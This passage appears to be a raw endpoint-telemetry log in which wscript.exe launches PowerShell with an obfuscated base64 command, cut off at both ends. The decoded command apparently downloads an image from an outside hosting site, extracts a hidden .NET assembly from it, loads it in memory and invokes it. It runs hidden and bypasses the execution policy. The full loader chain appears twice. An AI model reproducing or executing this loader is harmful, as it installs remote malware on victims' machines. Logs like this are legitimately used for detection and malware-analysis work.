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IwOCcvHbRIwOLvHbRIwOBbvHbRIwOEMvHbRIwOavHbRIwOBhvHbRIwOHIvHbRIwOXQvHbRIwOzvHbRIwODYvHbRIwOIvHbRIwOvHbRIwOgvHbRIwOC0vHbRIwOcgBlvHbRIwOFvHbRIwOvHbRIwObvHbRIwOBhvHbRIwOGMvHbRIwOZQvHbRIwOnvHbRIwOG0vHbRIwOSwvHbRIwOzvHbRIwOCcvHbRIwOLvHbRIwOBbvHbRIwOEMvHbRIwOavHbRIwOBhvHbRIwOHIvHbRIwOXQvHbRIwO5vHbRIwODIvHbRIwOKQvHbRIwOgvHbRIwOHwvHbRIwOIvHbRIwOvHbRIwOuvHbRIwOCvHbRIwOvHbRIwOKvHbRIwOvHbRIwOgvHbRIwOCQvHbRIwORQBuvHbRIwOFYvHbRIwOOgBDvHbRIwOG8vHbRIwOTQBzvHbRIwOFvHbRIwOvHbRIwOZQBDvHbRIwOFsvHbRIwONvHbRIwOvHbRIwOsvHbRIwODIvHbRIwONvHbRIwOvHbRIwOsvHbRIwODIvHbRIwONQBdvHbRIwOC0vHbRIwOagBPvHbRIwOGkvHbRIwOTgvHbRIwOnvHbRIwOCcvHbRIwOKQvHbRIwO=';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('vHbRIwO','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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